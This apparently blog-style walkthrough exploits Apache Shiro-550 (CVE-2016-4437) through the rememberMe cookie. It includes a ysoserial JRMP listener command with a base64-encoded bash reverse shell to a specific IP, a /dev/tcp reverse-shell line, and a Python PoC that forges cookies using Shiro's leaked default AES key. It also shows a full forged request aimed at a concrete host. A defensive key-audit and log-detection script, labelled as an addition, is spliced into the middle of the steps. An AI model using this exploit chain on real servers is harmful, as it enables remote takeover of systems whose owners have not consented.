Apache Shiro™ (pronounced "sheeroh", Japanese for "castle") is an open-source security framework that provides authentication, authorization, cryptography and session management. Shiro is intuitive and easy to use while still providing robust security.

Shiro encrypts the rememberMe cookie with AES-128-CBC, so a malicious user can mount a padding-oracle attack to construct serialized data and carry out a deserialization attack in the same style as SHIRO-550 (this is Shiro-721).

Below is a reproduction of the Shiro-550 (CVE-2016-4437) reverse-shell method:

Tick "Remember Me", then capture the request

Append rememberMe= after the existing cookie; remember to separate it with a ;

Reverse shell

On a public host, use the JRMP module of ysoserial.jar to listen on port 1099 (the port number is arbitrary)

Use this page to encode the payload

http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/<VPS IP>/<VPS port listening for the reverse shell> 0>&1

If it doesn't work, try changing the number after CommonsCollections

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTQuMjIzLjEzNy44Ny8xOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

Open another window

Generate the exploit PoC

This IP is the VPS IP, and the port is the port JRMP was just set to listen on

Usage: python shiro.py x.x.x.x:1099

import sys
import base64
import uuid
import subprocess
from Crypto.Cipher import AES  # pycryptodome


def encode_rememberme(command):
    # ysoserial.jar must be in the current directory; JRMPClient takes host:port
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7 padding, as Shiro expects for AES-CBC
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Shiro's hard-coded default rememberMe key (the root cause of Shiro-550)
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes  # random 16-byte IV
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    # cookie layout: IV followed by ciphertext, then base64-encoded
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print(payload.decode())  # decode so Python 3 prints the cookie without the b'' wrapper
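The defender's counterpart to the script above, as an added example that is not part of the original post: two checks an operator of a Shiro application can run. It assumes the shiro.ini property name securityManager.rememberMeManager.cipherKey for the rememberMe key and a constructed, simplified access-log format with a Set-Cookie column (the log lines are constructed). The detection relies on Shiro answering a rememberMe cookie it cannot decrypt or deserialize with Set-Cookie: rememberMe=deleteMe; one such response is a normal expired or corrupt cookie, while a burst from one client indicates key guessing or padding-oracle probing.

```python
import base64
import re
import secrets
from collections import Counter

# The hard-coded cipherKey that the PoC script above relies on (Shiro-550 / CVE-2016-4437).
SHIRO_DEFAULT_KEY = "kPH+bIxk5D2deZiIxcaaaA=="

# shiro.ini property used to set the rememberMe key (assumed property name).
CIPHER_KEY_RE = re.compile(
    r"^\s*securityManager\.rememberMeManager\.cipherKey\s*=\s*(\S+)", re.M
)


def generate_cipher_key() -> str:
    """Return a fresh random 128-bit AES key, base64-encoded, for use as cipherKey."""
    return base64.b64encode(secrets.token_bytes(16)).decode()


def audit_cipher_key(shiro_ini: str) -> str:
    """Classify the rememberMe key configured in a shiro.ini text.

    'missing' - no key set; on Shiro before 1.2.5 the built-in key is used (vulnerable)
    'default' - the leaked built-in key is configured explicitly (vulnerable)
    'invalid' - not base64, or not a valid AES key length
    'custom'  - a deployment-specific key is configured
    """
    m = CIPHER_KEY_RE.search(shiro_ini)
    if not m:
        return "missing"
    key = m.group(1)
    if key == SHIRO_DEFAULT_KEY:
        return "default"
    try:
        raw = base64.b64decode(key, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "invalid"
    if len(raw) not in (16, 24, 32):
        return "invalid"
    return "custom"


# Constructed access-log sample (not from a real server):
#   client_ip method path status set_cookie
SAMPLE_LOG = """\
10.0.0.5 GET /index.jsp 200 -
10.0.0.5 GET /login.jsp 200 rememberMe=deleteMe
203.0.113.9 POST /login.jsp 200 rememberMe=deleteMe
203.0.113.9 POST /login.jsp 200 rememberMe=deleteMe
203.0.113.9 POST /login.jsp 200 rememberMe=deleteMe
203.0.113.9 POST /login.jsp 200 rememberMe=deleteMe
203.0.113.9 POST /login.jsp 200 rememberMe=deleteMe
203.0.113.9 POST /login.jsp 200 rememberMe=deleteMe
"""


def detect_remember_me_probing(log_text: str, threshold: int = 5) -> dict:
    """Count per client IP the responses in which Shiro discarded the rememberMe
    cookie (Set-Cookie: rememberMe=deleteMe). Returns {ip: count} for every
    client at or above the threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip lines that do not match the constructed format
        ip, _method, _path, _status, set_cookie = parts
        if set_cookie.startswith("rememberMe=deleteMe"):
            counts[ip] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print("suggested cipherKey:", generate_cipher_key())
    print("cipherKey status of an empty shiro.ini:", audit_cipher_key("[main]\n"))
    print("clients probing rememberMe:", detect_remember_me_probing(SAMPLE_LOG))
```

The threshold is deliberately above one: a single deleteMe response is routine, and alerting on it would page on every user with a stale cookie. Upgrading past the affected versions and setting a per-deployment cipherKey closes the hard-coded-key issue; the log check remains useful afterwards because Shiro-721 style probing produces the same deleteMe pattern regardless of key.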

Then start listening on the reverse-shell port you configured

Then paste the cookie into Burp and send the request

POST /login.jsp HTTP/1.1
Host: 188.40.189.135:17938
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: http://188.40.189.135:17938
Connection: close
Referer: http://188.40.189.135:17938/login.jsp
Cookie: JSESSIONID=4422C6AF4480FF4B5C040C030B9CFABD;rememberMe=DrxbpWvQSOuKUeVud7jHq/QhKM+XNNpp5FL2tMjLiWP4oHAlM9IzuUAxPF62xCHiKyR4qzjpPTvOteDZAEpKm/ZgV8dbfiVzZXS8+GErqTin3BNwKj1kWSn8iXUJaN9IScgMooj9N79in14q+Y/5WVVzLDol/tsZvJzUwzbaWa8naNW033BJo0VSkpVy+aiRjI6kvXsTUFP0SUYDrrOuoz1MT+htwDP/LR9jMQZXPsT1BKgDwcXPwBExWjLqjg+P4v8CbpCNE48zjqrG+lo6Yw9zaT1oWhPUDP/lJgH9+WvYuEW+g1Le+0FDBhNgI11rPiDim1RvHTzFz6etxaYMlKghirNmPbGClBJWeaD9jA681yDz8Jy9AgbnqCZ3cmLdd0Gxg2zbToLVAalVvriPow==
Upgrade-Insecure-Requests: 1

username=admin&password=admin123&rememberMe=on&submit=Login

That's about it...
